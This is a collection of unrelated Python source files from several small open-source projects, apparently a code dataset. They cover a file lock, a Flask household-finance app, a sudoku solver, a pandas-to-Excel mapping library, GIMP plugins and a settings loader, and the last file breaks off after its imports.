```python
from pathlib import Path
import os
import time
import atexit
class LockError(Exception):
pass
class Lock:
def __init__(self, path='.lock', release_on_exit=False):
"""
Lock object that keeps track of a file found at `self.path`. If there is a file found at `self.path`, the lock is considered... locked!
Parameters
==========
path : str, Path
path to write the lock file to (will be converted to `pathlib.Path`). Defaults to '.lock'.
"""
self.path = Path(path)
self._do_release_on_exit = None
self.release_on_exit = release_on_exit
@property
def name(self):
"""
name written to lock to prove ownership
"""
return 'pid:{}, obj:{}'.format(os.getpid(), id(self))
@property
def locked(self):
"""
Does the lock-file at `self.path` exist?
"""
return self.path.exists()
@property
def mine(self):
"""
Was the lock created by this object?
"""
try:
return self.path.read_text() == self.name
except FileNotFoundError:
raise LockError("Attempted to check ownership on lock that doesn't exist")
def acquire(self, force=False):
"""
Create the lock-file, and stamp on it that it was made by me!
Parameters
==========
force : bool
If the lock already exists, force switching ownership to me so `self.mine==True`. Defaults to False
"""
if self.locked and not force:
raise LockError("Attempted to acquire on already locked lock!")
self.path.write_text(self.name)
def release(self, force=False, rerelease=True):
"""
Release the lock.
Will get upset if the lock isn't `self.mine` but can override by setting `force=True`.
Parameters
==========
force : bool
force releasing the lock, even if not `self.mine`. (default `False`)
rerelease :
when `True` will not complain if attempting to release and already released lock. (default `True`)
Returns
=======
name : str
the name of the lock that was just released (None if no lock was released)
"""
if not self.locked:
if not rerelease:
raise LockError("Attempted to release an already released lock")
return None
if not self.mine and not force:
raise LockError("Attempted to release a lock that wasn't mine, can set `force=True`")
name = self.path.read_text()
os.remove(self.path.as_posix())
return name
@property
def release_on_exit(self):
return self._do_release_on_exit
@release_on_exit.setter
def release_on_exit(self, do):
if do:
atexit.register(self.release)
else:
atexit.unregister(self.release)
self._do_release_on_exit = do
def wait(self, dt=0.01):
"""
Wait until lock is released.
Parameters
==========
dt : float
how long to wait between checking for `self.locked`
"""
while self.locked:
time.sleep(dt)
def __enter__(self):
self.acquire()
def __exit__(self, exception_type, exception_value, traceback):
self.release()
def __bool__(self):
return self.locked
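# Minimal usage sketch (creates and removes a '.lock' file in the working directory):
#   lock = Lock('.lock')
#   with lock:                        # acquire() on enter, release() on exit
#       assert lock.locked and lock.mine
#   other = Lock('.lock', release_on_exit=True)
#   other.acquire()                   # released automatically at interpreter exit via atexit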
``` |
{
"source": "0Hughman0/housenet",
"score": 2
} |
#### File: housenet/housenet/views.py
```python
from decimal import Decimal
from io import BytesIO
from flask import request, render_template, send_file, json
from housenet import base_app
from housenet.database import db
from housenet.database.database import Housemate, Cashflow, Transaction
@base_app.route('/')
def home():
housemates = Housemate.query.all()
data = []
for housemate in housemates:
data.append(tuple((housemate.name, housemate.current_chore.title)))
return render_template("home.html", title="Home", data=data)
@base_app.route("/profile/<name>", methods=["POST", "GET"])
def profile(name):
housemate = Housemate.query.get(name)
if not housemate:
return "<a>You're drunk, go </a><a href='/'>home</a>"
if request.method == "POST":
change_dict = request.form.copy()
reason = change_dict.pop("reason")
for payment_type, payments in change_dict.items():
payments_list = (payment for payment in json.loads(payments) if payment['value'])
for payment in payments_list:
debt = Cashflow.query.filter(Cashflow.from_name == housemate.name,
Cashflow.to_name == payment["name"]).first()
if not debt:
continue
amount = Decimal(payment['value'])
# if payment_type == "your_owed": # Creates confusion about who put what in
# debt = debt.mirror
# amount = -amount
transaction = debt.add(amount)
transaction.reason = reason
db.session.add(transaction)
db.session.commit()
current_chore = housemate.current_chore
debts = (cashflow.as_tuple for cashflow in housemate.out_flow)
debits = (cashflow.as_tuple for cashflow in housemate.in_flow)
quits = (cashflow.as_tuple for cashflow in housemate.quits)
return render_template("profile.html", title=name, current_chore=current_chore, debts=debts, debits=debits,
quits=quits)
@base_app.route("/transactions_history")
def transactions():
return render_template("transactions.html", title="Transactions")
@base_app.route("/api/get_transactions")
def get_transactions():
all_transactions = Transaction.query.all()
return json.dumps({"data": tuple(transaction.to_row() for transaction in all_transactions)})
@base_app.route("/api/ical/<name>")
def get_ical(name):
housemate = Housemate.query.get(name)
return send_file(BytesIO(housemate.get_ical_feed()),
attachment_filename="{}_chores.ics".format(name),
as_attachment=True)
```
#### File: 0Hughman0/housenet/tests.py
```python
from app_factory import create_app
import unittest
"""
To be implemented... probably
"""
app, db = create_app("DEBUG")
app.testing = True
class HousenetBaseTestCase:
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def test_add_amount(self):
self.app.post("/profile/Person%201/", data={"t": 1})
class CliTestsCase(HousenetBaseTestCase, unittest.TestCase):
def test_save_db(self):
pass
class TestHousenetInit(unittest.TestCase):
def setUp(self):
pass
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0Hughman0/sudokugh",
"score": 3
} |
#### File: 0Hughman0/sudokugh/sudokugh.py
```python
import numpy as np
import logging
import sys
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
RC_MASK = np.repeat(True, 9)
POSSIBLES = set(range(1, 10))
vals = np.vectorize(lambda cell: cell.val)
class Cell:
def __init__(self, grid, irow, icol):
self.possibles = POSSIBLES.copy()
self.grid = grid
self.irow = irow
self.icol = icol
self._row_mask = RC_MASK.copy()
self._col_mask = RC_MASK.copy()
self._box_mask = RC_MASK.copy().reshape(3, 3)
self._row_mask[self.icol] = False
self._col_mask[self.irow] = False
self._box_mask[self.irow - self.irbox, self.icol - self.icbox] = False
@property
def irbox(self):
return self.irow - self.irow % 3
@property
def icbox(self):
return self.icol - self.icol % 3
@property
def box(self):
return self.grid[self.irbox:self.irbox+3, self.icbox:self.icbox+3][self._box_mask]
@property
def row(self):
return self.grid[self.irow, :][self._row_mask]
@property
def col(self):
return self.grid[:, self.icol][self._col_mask]
@property
def fixed(self):
return len(self) <= 1
@property
def val(self):
if self.fixed:
return list(self.possibles)[0]
else:
return -1
def fix(self, val):
self.possibles = {val}
def __len__(self):
return self.possibles.__len__()
def __repr__(self):
return f"<Cell {self.irow, self.icol} {self.possibles}>"
def __hash__(self):
return (self.irow, self.icol, self.possibles).__hash__()
class Grid:
def __init__(self):
self.grid = np.array([[Cell(self, row, col) for col in range(9)] for row in range(9)])
def __getitem__(self, irowcol):
irow, icol = irowcol
return self.grid[irow, icol]
@classmethod
def from_string(cls, grid_string):
g = grid_string.strip()
cleaned = [l.split(',') for l in g.replace('|', '').replace(' ', '0').split('\n')]
arrayed = np.array(cleaned).astype(int)
return cls.from_array(arrayed)
@classmethod
def from_input(cls):
o = cls()
for i in range(9):
print("New row\n", i+1)
for j in range(9):
                if j % 3 == 0:
print("New Box\n")
v = input(f"Enter value for cell {i + 1, j + 1}, blank for no value")
if v:
o[i, j].fix(int(v))
return o
@classmethod
def from_array(cls, array):
"""
0 or -1 for blank squares!
"""
o = cls()
for row, grow in zip(array, o.grid):
for num, cell in zip(row, grow):
if num in POSSIBLES:
cell.fix(num)
return o
def as_array(self):
return vals(self.grid)
def copy(self):
return self.from_array(self.as_array())
@property
def broken(self):
return any(len(cell.possibles) <= 0 for cell in self.grid.flatten())
def ifixed(self, collection=None):
if collection is None:
collection = self.grid
for cell in collection.flatten():
if cell.fixed:
yield cell
def iunfixed(self, collection=None):
if collection is None:
collection = self.grid
for cell in collection.flatten():
if not cell.fixed:
yield cell
def find_required(self, collection):
required = POSSIBLES.copy()
for fixed in self.ifixed(collection):
required -= fixed.possibles
return required
def count_fixed(self, collection=None):
if collection is None:
collection = self.grid
return sum(1 for cell in self.ifixed(collection))
def nearest_complete(self):
all_unfixed = list(self.iunfixed())
all_unfixed.sort(key=lambda cell: (len(cell.possibles), # smallest number of candidates
(8 * 3) - sum(self.count_fixed(collection) for collection in (cell.row, cell.col, cell.box)))) # largest amount of additional info!
return all_unfixed
def gen_targets(self):
while not all(cell.fixed for cell in self.grid.flatten()):
nearest_complete = self.nearest_complete()
count = self.count_fixed()
for cell in nearest_complete:
yield cell
if self.count_fixed() != count: # New fixed cells, need to start again!
break
else:
raise RuntimeError("Hit roadblock, all cells presented") # got to the end and made no progress
def display(self):
array = self.as_array()
return np.where(array != -1, array, ' ').astype(str)
def find_possibles(self, cell):
eliminated = set()
for collection in (cell.row, cell.col, cell.box):
for other in self.ifixed(collection):
eliminated.update(other.possibles)
return POSSIBLES ^ eliminated
def update_possibles(self):
for unfixed in self.iunfixed():
unfixed.possibles = self.find_possibles(unfixed)
if self.broken:
raise RuntimeError("Impossible to solve cell found")
def try_elimination(self, unfixed):
for collection in (unfixed.row, unfixed.col, unfixed.box):
possibles = self.find_required(collection) & unfixed.possibles
alternatives = self.iunfixed(collection)
for alternative in alternatives:
possibles -= alternative.possibles
if len(possibles) == 1:
unfixed.possibles = possibles
return True
return False
def solve(self):
logging.info("Performing initial reduction")
i = 0
self.update_possibles()
logging.info("Eliminating possibilities")
for i, target in enumerate(self.gen_targets()):
logging.info(f"Trying to deduce {target}")
if self.try_elimination(target):
logging.info(f"Success! {target.val}")
logging.info("Updating consequences")
self.update_possibles()
else:
logging.info("No luck!")
logging.info("Solved")
return i + 1
def deepsolve(self, pmin=1/9 ** 3, _p=1.0):
try:
i = self.solve()
logging.info("Deep solved")
return i
except RuntimeError:
logging.info("Got stuck, attempting to branch")
nearest_complete = self.nearest_complete()
for iba, candidate in enumerate(nearest_complete):
_p = (1 / len(candidate.possibles) * _p)
if _p < pmin:
raise RuntimeError("Chance of success judged too low")
for possible in candidate.possibles:
branch_grid = self.copy()
branch_grid[candidate.irow, candidate.icol].fix(possible)
try:
logging.info(f"Entering a branch for {candidate} using {possible}")
complete = branch_grid.deepsolve(pmin=pmin, _p=_p)
self.from_array(complete.as_array())
return complete
except Exception as e:
logging.info(f"Deadend reached due to {e}")
del branch_grid
if __name__ == '__main__':
from tests import T1, T2, T3, T4
g1 = Grid.from_array(T1)
g2 = Grid.from_array(T2)
g3 = Grid.from_array(T3)
g4 = Grid.from_array(T4)
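# Hedged usage sketch (T1..T4 are assumed to be 9x9 integer arrays in tests.py, 0/-1 for blanks):
#   g1.solve()       # pure elimination; raises RuntimeError when it hits a roadblock
#   g3.deepsolve()   # falls back to branching on the most constrained cell when stuck
#   print(g3.display())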
``` |
{
"source": "0Hughman0/xl_link",
"score": 3
} |
#### File: xl_link/xl_link/mappers.py
```python
import pandas as pd
try:
from pandas.io.formats.excel import ExcelFormatter
except ImportError:
from pandas.formats.format import ExcelFormatter
from pandas.io.common import _stringify_path
from .xl_types import XLCell
from .chart_wrapper import create_chart, SINGLE_CATEGORY_CHARTS, CATEGORIES_REQUIRED_CHARTS
def get_xl_ranges(frame_index, frame_columns,
sheet_name='Sheet1',
columns=None,
header=True,
index=True,
index_label=None,
startrow=0,
startcol=0,
merge_cells=True):
"""
Deduces location of data_range, index_range and col_range within excel spreadsheet, given the parameters provided.
Does not require an actual DataFrame, which could be useful!
Parameters
----------
frame_index: Pandas Index or Array-like
to determine location of index within spreadsheet.
frame_columns: Pandas Index or Array-like
used to determine location of column within spreadsheet.
sheet_name : str
default ‘Sheet1’, Name of sheet which will contain DataFrame
columns : sequence
optional, Columns to write
header : bool or list of strings,
default True Write out the column names. If a list of strings is given it is assumed to be aliases for the column names
index : bool
default True. Write row names (index)
index_label : str or sequence
default None. Column label for index column(s) if desired. If None is given, and header and index are True, then the index names are used. A sequence should be given if the
DataFrame uses MultiIndex.
startrow : int
upper left cell row to dump data frame
startcol : int
upper left cell column to dump data frame
merge_cells : bool
default True. Write MultiIndex and Hierarchical Rows as merged cells.
Returns
-------
data_range, index_range, col_range : XLRange
Each range represents where the data, index and columns can be found on the spreadsheet
empty_f : DatFrame
an empty DataFrame with matching Indices.
"""
empty_f = pd.DataFrame(index=frame_index, columns=frame_columns)
formatter = ExcelFormatter(empty_f,
cols=columns,
header=header,
index=index,
index_label=index_label,
merge_cells=merge_cells)
excel_header = list(formatter._format_header())
col_start, col_stop = excel_header[0], excel_header[-1]
col_start_cell = XLCell(col_stop.row + startrow, col_start.col + startcol, sheet_name)
col_stop_cell = XLCell(col_stop.row + startrow, col_stop.col + startcol, sheet_name)
if isinstance(empty_f.index, pd.MultiIndex):
col_start_cell = col_start_cell.translate(0, 1)
col_range = col_start_cell - col_stop_cell
body = list(formatter._format_body())
if empty_f.index.name or index_label:
body.pop(0) # gets rid of index label cell that comes first!
index_start_cell = XLCell(body[0].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name)
index_stop_cell = XLCell(body[-1].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name)
index_range = index_start_cell - index_stop_cell
data_start_cell = XLCell(index_start_cell.row, col_start_cell.col, sheet_name)
data_stop_cell = XLCell(index_stop_cell.row, col_stop_cell.col, sheet_name)
data_range = data_start_cell - data_stop_cell
return data_range, index_range, col_range, empty_f
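# Hedged usage sketch: the ranges can be computed without writing any data to disk.
#   data_rng, idx_rng, col_rng, _ = get_xl_ranges(['Mon', 'Tues'],
#                                                 ['Breakfast', 'Lunch'],
#                                                 sheet_name='Sheet1')
#   data_rng, idx_rng, col_rng     # XLRange objects usable e.g. in chart definitions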
def write_frame(f, excel_writer, to_excel_args=None):
"""
Write a Pandas DataFrame to excel by calling to_excel, returning an XLMap, that can be used to determine
the position of parts of f, using pandas indexing.
Parameters
----------
f : DataFrame
Frame to write to excel
excel_writer : str or ExcelWriter
Path or existing Excel Writer to use to write frame
to_excel_args : dict
Additional arguments to pass to DataFrame.to_excel, see docs for DataFrame.to_excel
Returns
-------
XLMap :
Mapping that corresponds to the position in the spreadsheet that frame was written to.
"""
xlf = XLDataFrame(f)
return xlf.to_excel(excel_writer, **to_excel_args)
def _mapper_to_xl(value):
"""
Convert mapper frame result to XLRange or XLCell
"""
if isinstance(value, XLCell):
return value
if isinstance(value, pd.Series):
return value.values[0] - value.values[-1]
if isinstance(value, pd.DataFrame):
return value.values[0, 0] - value.values[-1, -1]
raise TypeError("Could not conver {} to XLRange or XLCell".format(value))
class _SelectorProxy:
"""
Proxy object that intercepts calls to Pandas DataFrame indexers, and re-interprets result into excel locations.
Parameters
----------
mapper_frame: DataFrame
with index the same as the DataFrame it is representing, however, each cell contains
the location they sit within the spreadsheet.
selector_name: str
name of the indexer SelectorProxy is emulating, i.e. loc, iloc, ix, iat or at
Notes
-----
Only implements __getitem__ behaviour of indexers.
"""
def __init__(self, mapper_frame, selector_name):
self.mapper_frame = mapper_frame
self.selector_name = selector_name
def __getitem__(self, key):
val = getattr(self.mapper_frame, self.selector_name)[key]
return _mapper_to_xl(val)
class XLMap:
"""
An object that maps a Pandas DataFrame to it's positions on an excel spreadsheet.
Provides access to basic pandas indexers - __getitem__, loc, iloc, ix, iat and at.
These indexers are modified such that they return the cell/ range of the result.
The idea is should make using the data in spreadsheet easy to access, by using Pandas indexing syntax.
For example can be used to create charts more easily (see example below).
Notes
-----
Recommended to not be created directly, instead via, XLDataFrame.to_excel.
XLMap can only go 'one level deep' in terms of indexing, because each indexer always returns either an XLCell,
or an XLRange. The only workaround is to reduce the size of your DataFrame BEFORE you call write_frame.
This limitation drastically simplifies the implementation. Examples of what WON'T WORK:
>>> xlmap.loc['Mon':'Tues', :].index
AttributeError: 'XLRange' object has no attribute 'index'
>>> xlmap.index['Mon':'Tues'] # Doesn't work because index is not a Pandas Index, but an XLRange.
TypeError: unsupported operand type(s) for -: 'str' and 'int'
Parameters
----------
data_range, index_range, column_range : XLRange
that represents the region the DataFrame's data sits in.
f : DataFrame
that has been written to excel.
Attributes
----------
index : XLRange
range that the index column occupies
columns : XLRange
range that the frame columns occupy
data : XLRange
range that the frame data occupies
writer : Pandas.ExcelWriter
writer used to create spreadsheet
sheet : object
sheet object corresponding to sheet the frame was written to, handy if you want insert a chart into the same sheet
Examples
--------
>>> calories_per_meal = XLDataFrame(columns=("Meal", "Mon", "Tues", "Weds", "Thur"),
data={'Meal': ('Breakfast', 'Lunch', 'Dinner', 'Midnight Snack'),
'Mon': (15, 20, 12, 3),
'Tues': (5, 16, 3, 0),
'Weds': (3, 22, 2, 8),
'Thur': (6, 7, 1, 9)})
>>> calories_per_meal.set_index("Meal", drop=True, inplace=True)
Write to excel
>>> writer = pd.ExcelWriter("Example.xlsx", engine='xlsxwriter')
>>> xlmap = calories_per_meal.to_excel(writer, sheet_name="XLLinked") # returns the XLMap
Create chart with XLLink
>>> workbook = writer.book
>>> xl_linked_sheet = writer.sheets["XLLinked"]
>>> xl_linked_chart = workbook.add_chart({'type': 'column'})
>>> for time in calories_per_meal.index:
>>> xl_linked_chart.add_series({'name': time,
                                    'categories': xlmap.columns.frange,
                                    'values': xlmap.loc[time].frange})
"""
def __init__(self, data_range, index_range, column_range, f, writer=None):
self.index = index_range
self.columns = column_range
self.data = data_range
self._f = f.copy()
self.writer = writer
self.book = writer.book
self.sheet = writer.sheets[self.index.sheet]
self._mapper_frame = f.copy().astype(XLCell)
x_range = self._f.index.size
y_range = self._f.columns.size
for x in range(x_range):
for y in range(y_range):
self._mapper_frame.values[x, y] = data_range[x, y]
@property
def f(self):
"""
for convenience provides read-only access to the DataFrame originally written to excel.
"""
return self._f
@property
def df(self):
"""
for convenience provides read-only access to the DataFrame originally written to excel.
"""
return self._f
def __repr__(self):
return "<XLMap: index: {}, columns: {}, data: {}>".format(self.index, self.columns, self.data)
def create_chart(self, type_='scatter',
values=None, categories=None, names=None,
subtype=None,
title=None, x_axis_name=None, y_axis_name=None):
"""
Create excel chart object based off of data within the Frame.
Parameters
----------
type_ : str
Type of chart to create.
values : str or list or tuple
            label or list of labels corresponding to the columns to use as values for each series in the chart.
Default all columns.
categories : str or list or tuple
            label or list of labels corresponding to the columns to use as categories for each series in the chart.
Default, use index for 'scatter' or None for everything else.
names: str or list or tuple
            str or list of strs giving the name of each series in the chart.
Default, column names corresponding to values.
subtype : str
subtype of type, only available for some chart types e.g. bar, see Excel writing package for details
title : str
chart title
x_axis_name : str
used as label on x_axis
y_axis_name : str
used as label on y_axis
Returns
-------
Chart object corresponding to the engine selected
Notes
-----
values, categories parameters can only correspond to columns.
"""
if names is None and categories is None:
names = tuple(name for name in self.f.columns.values)
elif names is None and isinstance(categories, (str, int, list, tuple)):
names = categories
elif isinstance(names, (str, list, tuple)):
names = names
else:
raise TypeError("Couldn't understand names input: " + names)
if values is None:
values = tuple(self[value] for value in self.f.columns)
elif isinstance(values, list) or isinstance(values, tuple):
values = tuple(self[value] for value in values)
else:
values = self[values]
if categories is None and (type_ in SINGLE_CATEGORY_CHARTS and isinstance(values, tuple)) or \
type_ in CATEGORIES_REQUIRED_CHARTS:
categories = self.index # Default, use x as index
elif categories is None:
pass
elif isinstance(categories, (list, tuple)):
categories = list(self[category] for category in categories)
else:
categories = self[categories]
return create_chart(self.book, self.writer.engine, type_,
values, categories, names,
subtype, title,
x_axis_name, y_axis_name)
def __getitem__(self, key):
"""
Emulates DataFrame.__getitem__ (DataFrame[key] syntax), see Pandas DataFrame indexing for help on behaviour.
Will return the location of the columns found, rather than the underlying data.
Parameters
----------
key : hashable or array-like
hashables, corresponding to the names of the columns desired.
Returns
-------
XLRange :
corresponding to position of found colummn(s) within spreadsheet
Example
-------
>>> xlmap['Col 1']
<XLRange: B2:B10>
"""
val = self._mapper_frame[key]
return _mapper_to_xl(val)
@property
def loc(self):
"""
Proxy for DataFrame.loc, see Pandas DataFrame loc help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.loc['Tues']
<XLRange: A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'loc')
@property
def iloc(self):
"""
Proxy for DataFrame.iloc, see Pandas DataFrame iloc help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.iloc[3, :]
<XLRange: A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'iloc')
@property
def ix(self):
"""
Proxy for DataFrame.ix, see Pandas DataFrame ix help for behaviour. (That said this is deprecated since 0.20!)
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.ix[3, :]
<XLRange A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'ix')
@property
def iat(self):
"""
Proxy for DataFrame.iat, see Pandas DataFrame iat help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell
location corresponding to position value within spreadsheet.
Example
-------
>>> xlmap.iat[3, 2]
<XLCell C3>
"""
return _SelectorProxy(self._mapper_frame, 'iat')
@property
def at(self):
"""
Proxy for DataFrame.at, see Pandas DataFrame at help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell
location corresponding to position value within spreadsheet.
Example
-------
>>> xlmap.at["Mon", "Lunch"]
<XLCell: C3>
"""
return _SelectorProxy(self._mapper_frame, 'at')
class XLDataFrame(pd.DataFrame):
"""
Monkeypatched DataFrame modified by xl_link!
Changes:
--------
* to_excel modified to return an XLMap.
* XLDataFrame._constructor set to XLDataFrame -> stops reverting to normal DataFrame
Notes
-----
Conversions from this DataFrame to Series or Panels will return regular Panels and Series,
which will convert back into regular DataFrame's upon expanding/ reducing dimensions.
See Also
--------
Pandas.DataFrame
"""
@property
def _constructor(self):
return XLDataFrame
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
float_format=None, columns=None, header=True, index=True,
index_label=None, startrow=0, startcol=0, engine=None,
merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
**kwargs):
"""
Monkeypatched DataFrame.to_excel by xl_link!
Changes:
--------
Returns
-------
XLMap
corresponding to position of frame as it appears in excel (see XLMap for details)
See Also
--------
Pandas.DataFrame.to_excel for info on parameters
Note
----
When providing a path as excel_writer, default engine used is 'xlsxwriter', as xlsxwriter workbooks can only be
saved once, xl_link suppresses calling `excel_writer.save()`, as a result, `xlmap.writer.save()` should be
called once no further changes are to be made to the spreadsheet.
"""
if isinstance(excel_writer, pd.ExcelWriter):
need_save = False
else:
excel_writer = pd.ExcelWriter(_stringify_path(excel_writer), engine=engine)
need_save = True if excel_writer.engine != 'xlsxwriter' else False # xlsxwriter can only save once!
super().to_excel(excel_writer, sheet_name=sheet_name, na_rep=na_rep,
float_format=float_format, columns=columns, header=header, index=index,
index_label=index_label, startrow=startrow, startcol=startcol, engine=engine,
merge_cells=merge_cells, encoding=encoding, inf_rep=inf_rep, verbose=verbose,
**kwargs)
if need_save:
excel_writer.save()
data_range, index_range, col_range, _ = get_xl_ranges(self.index, self.columns,
sheet_name=sheet_name,
columns=columns,
header=header,
index=index,
index_label=index_label,
startrow=startrow,
startcol=startcol,
merge_cells=merge_cells)
f = self.copy()
if isinstance(columns, list) or isinstance(columns, tuple):
f = f[columns]
return XLMap(data_range, index_range, col_range, f, writer=excel_writer)
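# Hedged sketch of the intended workflow (xlsxwriter engine assumed, per the note above;
# 'df' stands for any DataFrame you want to write):
#   writer = pd.ExcelWriter('example.xlsx', engine='xlsxwriter')
#   xlmap = XLDataFrame(df).to_excel(writer, sheet_name='Sheet1')
#   chart = xlmap.create_chart('column', title='My chart')
#   xlmap.sheet.insert_chart('G2', chart)   # insert_chart is xlsxwriter's worksheet API
#   writer.save()                           # save once, as noted in to_excel's docstring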
``` |
{
"source": "0ion9/gimp-plugins",
"score": 2
} |
#### File: 0ion9/gimp-plugins/backgroundify.py
```python
from gimpfu import *
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
BGCOLOR, PATTERN = 0, 1
MODES = (
(_('Normal'), NORMAL_MODE),
(_('Dissolve'), DISSOLVE_MODE),
(_('Lighten only'), LIGHTEN_ONLY_MODE),
(_('Screen'), SCREEN_MODE),
(_('Dodge'), DODGE_MODE),
(_('Addition'), ADDITION_MODE),
(_('Darken Only'), DARKEN_ONLY_MODE),
(_('Multiply'), MULTIPLY_MODE),
(_('Burn'), BURN_MODE),
(_('Overlay'), OVERLAY_MODE),
(_('Soft Light'), SOFTLIGHT_MODE),
(_('Hard Light'), HARDLIGHT_MODE),
(_('Difference'), DIFFERENCE_MODE),
(_('Subtract'), SUBTRACT_MODE),
(_('Grain Extract'), GRAIN_EXTRACT_MODE),
(_('Grain Merge'), GRAIN_MERGE_MODE),
(_('Divide'), DIVIDE_MODE),
(_('Hue'), HUE_MODE),
(_('Saturation'), SATURATION_MODE),
(_('Color'), COLOR_MODE),
(_('Value'), VALUE_MODE),
(_('Behind(?)'), BEHIND_MODE),
)
MODELIST = tuple(v[0] for v in MODES)
#
# some modes have a 'neutral color' that results in no change; we try to use this when creating a new layer without alpha.
#
# Note that the pairs (MULTIPLY, DIVIDE) and (ADD, SUB) each have inverse effects with the same neutral color
# (eg. multiply reduces brightness proportional to distance from 255, divide increases brightness proportional to distance from 0)
#
# Other modes have no neutral color and obtaining 0 effect is only done via setting alpha=0 or layer_opacity=0
MODENEUTRALCOLOR = (
({LIGHTEN_ONLY_MODE, ADDITION_MODE, SCREEN_MODE, SUBTRACT_MODE, DODGE_MODE}, (0, 0, 0)),
({DARKEN_ONLY_MODE, MULTIPLY_MODE, BURN_MODE, DIVIDE_MODE}, (255, 255, 255)),
({GRAIN_MERGE_MODE, GRAIN_EXTRACT_MODE, OVERLAY_MODE, HARDLIGHT_MODE, SOFTLIGHT_MODE}, (128, 128, 128))
)
def without_group_layers(layerlist):
"""Returns a recursively flattened list of layers.
Group layers are recursed into but not included in results."""
layers = []
for l in layerlist:
if pdb.gimp_item_is_group(l):
layers.extend(without_group_layers(l.children))
else:
layers.append(l)
return layers
def new_layer(image, drawable, name, mode, opacity, alpha):
pdb.gimp_image_undo_group_start(image)
layertype = image.layers[0].type
mode = MODES[mode][-1]
layer = pdb.gimp_layer_new(image, image.width, image.height, layertype, name, opacity, mode)
for members, fillcolor in MODENEUTRALCOLOR:
if mode in members:
pdb.gimp_context_push()
pdb.gimp_context_set_background(fillcolor)
pdb.gimp_drawable_fill(layer, BACKGROUND_FILL)
pdb.gimp_context_pop()
break
else:
pdb.gimp_drawable_fill(layer, WHITE_FILL)
pdb.gimp_image_insert_layer(image, layer, None, -1)
if alpha:
pdb.gimp_layer_add_alpha(layer)
# else:
# pdb.gimp_layer_remove_alpha(layer)
pdb.gimp_image_undo_group_end(image)
def backgroundify(image, drawable, fillmode, all_layers):
all_layers = (all_layers == 1)
# XXX cope with layer groups (they should be unaffected)
layers = []
# drawable is set to None for group layers
base = [drawable if drawable else image.active_layer]
if all_layers:
base = list(image.layers)
layers = without_group_layers(base)
pdb.gimp_image_undo_group_start(image)
bfill_mode = (BG_BUCKET_FILL if fillmode == BGCOLOR else PATTERN_BUCKET_FILL)
for layer in layers:
pdb.gimp_edit_bucket_fill_full(layer, bfill_mode, BEHIND_MODE, 100.0, 255.0, 0, 1, 0, 0, 0)
pdb.gimp_image_undo_group_end(image)
register(
proc_name="python-fu-backgroundify",
blurb="Add a background color/pattern to current or all layers.",
help=("Add a background color/pattern to current or all layers. Note that only the selected area is affected."
" You may filter only the contents of a given layer group, by having it selected before invoking this filter. "),
author="<NAME>",
copyright="<NAME>",
date=("2015"),
label=("_Backgroundify layer(s)..."),
imagetypes=("*"),
params=[
(PF_IMAGE, "image", "_Image", None),
(PF_LAYER, "drawable", "_Drawable", None),
(PF_OPTION, "Fillmode", "_Fill mode", 0,
(_("Background Color"),
_("Pattern"))),
(PF_BOOL, "all_layers", "Apply to _all layers", 0),
],
results=[],
function=backgroundify,
menu=("<Image>/Layer/Transparency"),
domain=("gimp20-python", gimp.locale_directory)
)
register(
proc_name="python-fu-new-layer",
blurb="Quickly create a new image-sized layer with specified mode and opacity",
help=("..."),
author="<NAME>",
copyright="<NAME>",
date=("2015"),
label=("_New Layer(quick)..."),
imagetypes=("*"),
params=[
(PF_IMAGE, "image", "_Image", None),
(PF_LAYER, "drawable", "_Drawable", None),
(PF_STRING, "name", "_Name", "Layer"),
(PF_OPTION, "mode", "_Blending mode", 0,
MODELIST),
(PF_SLIDER, "opacity", "_Opacity", 100, (0, 100, 1)),
(PF_BOOL, "alpha", "Alpha channel", 0),
],
results=[],
function=new_layer,
menu=("<Image>/Layer/Stack"),
domain=("gimp20-python", gimp.locale_directory)
)
main()
``` |
{
"source": "0ip/pymarkview",
"score": 3
} |
#### File: pymarkview/pymarkview/settings.py
```python
import io
import json
from pathlib import Path
class Settings:
FILE = "settings.json"
DEFAULTS = {
"font_family": "Consolas",
"font_size": 12,
"tab_width": 2,
"word_wrap": True,
"show_menu": True,
"md_parser": "markdown2",
"mathjax": True
}
def __init__(self):
self.__load_settings()
def __getattr__(self, key: str) -> str:
return self.DEFAULTS.get(key, None)
def get(self, key: str) -> str:
return self.DEFAULTS.get(key, None)
def set(self, key: str, value) -> None:
self.DEFAULTS[key] = value
self.__save_settings()
def __load_settings(self) -> None:
if not Path(self.FILE).exists():
self.__save_settings()
return
with io.open(self.FILE, "r", encoding="utf-8") as f:
try:
user_settings = json.load(f)
except json.decoder.JSONDecodeError:
raise SettingsError("Cannot read settings!")
for key, value in user_settings.items():
if key in self.DEFAULTS:
self.DEFAULTS[key] = value
else:
print("Found unknown setting '{key}'. Skipping.".format(key=key))
user_settings_stale = False
for key, value in self.DEFAULTS.items():
if key not in user_settings:
print("Adding new setting '{key}'.".format(key=key))
user_settings_stale = True
if user_settings_stale:
self.__save_settings()
def __save_settings(self) -> None:
with io.open(self.FILE, "w", encoding="utf-8") as f:
json.dump(self.DEFAULTS, f, indent=4, sort_keys=True)
class SettingsError(Exception):
def __init__(self, message):
super().__init__(message)
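# Minimal usage sketch (reads and writes 'settings.json' in the working directory):
#   settings = Settings()
#   settings.get('font_size')      # -> 12 unless overridden in settings.json
#   settings.set('tab_width', 4)   # persisted immediately via __save_settings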
```
#### File: pymarkview/ui/tabbed_editor.py
```python
import io
import pickle
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QTextCursor
